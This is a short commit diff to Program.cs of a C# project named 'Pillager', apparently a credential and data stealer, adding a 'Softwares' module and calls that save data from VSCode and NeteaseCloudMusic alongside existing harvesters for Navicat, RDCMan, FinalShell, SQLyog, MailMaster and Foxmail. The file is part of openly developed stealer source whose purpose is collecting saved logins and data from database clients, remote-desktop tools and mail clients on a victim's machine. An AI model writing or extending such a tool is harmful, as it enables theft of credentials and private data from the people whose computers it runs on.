Update Program.cs

This commit is contained in:
簞純 2024-01-24 13:42:28 +08:00
parent e9c60891e3
commit 0d6814fa2c
1 changed files with 5 additions and 1 deletions

View File

@ -5,6 +5,7 @@ using Pillager.Helper;
using Pillager.Mails;
using Pillager.Messengers;
using Pillager.Others;
using Pillager.Softwares;
using Pillager.Tools;
namespace Pillager
@ -39,9 +40,12 @@ namespace Pillager
Navicat.Save(savepath);
RDCMan.Save(savepath);
FinalShell.Save(savepath);
VSCode.Save(savepath);
SQLyog.Save(savepath);
//Softwares
VSCode.Save(savepath);
NeteaseCloudMusic.Save(savepath);
//Mail
MailMaster.Save(savepath);
Foxmail.Save(savepath);